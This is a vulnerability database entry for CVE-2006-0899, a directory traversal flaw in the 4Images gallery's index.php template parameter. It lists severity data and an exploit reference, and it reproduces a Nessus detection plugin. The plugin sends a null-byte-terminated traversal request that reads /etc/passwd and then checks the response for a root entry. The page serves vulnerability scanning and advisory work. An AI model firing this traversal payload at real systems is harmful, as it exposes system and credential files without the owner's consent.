Vulnerabilities > CVE-2006-0899 - Remote File Include vulnerability in 4images

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
4images
nessus
exploit available
NVD
Published: 2006-02-27
Updated: 2018-10-18

Summary

Directory traversal vulnerability in index.php in 4Images 1.7.1 and earlier allows remote attackers to read and include arbitrary files via ".." (dot dot) sequences in the template parameter.

Vulnerable Configurations

Part Description Count
Application
4Images
1

Exploit-Db

description4Images <= 1.7.1 (Local Inclusion) Remote Code Execution Exploit. CVE-2006-0899. Webapps exploit for php platform
fileexploits/php/webapps/1533.php
idEDB-ID:1533
last seen2016-01-31
modified2006-02-26
platformphp
port
published2006-02-26
reporterrgod
sourcehttps://www.exploit-db.com/download/1533/
title4Images <= 1.7.1 Local Inclusion Remote Code Execution Exploit
typewebapps

Nessus

NASL familyCGI abuses
NASL id4IMAGES_171_DIRECTORY_TRAVERSAL.NASL
description4Images is installed on the remote system. It is an image gallery management system. The installed application does not validate user-input passed in the
last seen2020-06-01
modified2020-06-02
plugin id21020
published2006-03-06
reporterThis script is Copyright (C) 2006-2018 Ferdy Riphagen
sourcehttps://www.tenable.com/plugins/nessus/21020
title4Images <= 1.7.1 index.php template Parameter Traversal Local File Inclusion
code
#
# Script Written By Ferdy Riphagen 
# <f[dot]riphagen[at]nsec[dot]nl>
#
# Script distributed under the GNU GPLv2 License.
#
# Original advisory / discovered by : 
# https://web.archive.org/web/20060420020647/http://retrogod.altervista.org/4images_171_incl_xpl.html
#


include("compat.inc");

if (description) {
 script_id(21020);
 script_version("1.15");

 script_cve_id("CVE-2006-0899");
 script_bugtraq_id(16855);

 script_name(english:"4Images <= 1.7.1 index.php template Parameter Traversal Local File Inclusion");
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is prone to
directory traversal attacks." );
 script_set_attribute(attribute:"description", value:
"4Images is installed on the remote system.  It is an image gallery
management system. 

The installed application does not validate user-input passed in the
'template' variable of the 'index.php' file.  This allows an attacker
to execute directory traversal attacks and display the content of
sensitive files on the system and possibly to execute arbitrary PHP
code if he can write to local files through some other means." );
 script_set_attribute(attribute:"see_also", value:"http://www.4homepages.de/forum/index.php?topic=11855.0" );
 script_set_attribute(attribute:"see_also", value:"https://secuniaresearch.flexerasoftware.com/advisories/19026/" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to 4Images version 1.7.2 or sanitize the 'index.php' file as
advised by a forum post (see first URL)." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:W/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/03/06");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/02/26");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 summary["english"] = "Check if 4Images is vulnerable to directory traversal flaws";
 script_summary(english:summary["english"]);

 script_category(ACT_ATTACK);
 script_family(english:"CGI abuses");
 script_copyright(english:"This script is Copyright (C) 2006-2020 Ferdy Riphagen");

 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_keys("www/PHP");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("global_settings.inc");
include("misc_func.inc");

port = get_http_port(default:80, embedded:TRUE);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);

if (thorough_tests) dirs = list_uniq(make_list("/4images", "/gallery", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
 res = http_get_cache_ka(item:string(dir, "/index.php"), port:port); 
 if(res == NULL) exit(0);

 if (egrep(pattern:"Powered by.+4images", string:res)) {
 
  file = "../../../../../../../../etc/passwd";
  req = http_get(item:string(dir, "/index.php?template=", file, "%00"), port:port);

  recv = http_keepalive_send_recv(data:req, port:port, bodyonly:TRUE);
  if (recv == NULL) exit(0);

  if (egrep(pattern:"root:.*:0:[01]:.*:", string:recv)) {
   security_hole(port);
   exit(0); 
  } 
 }
}

References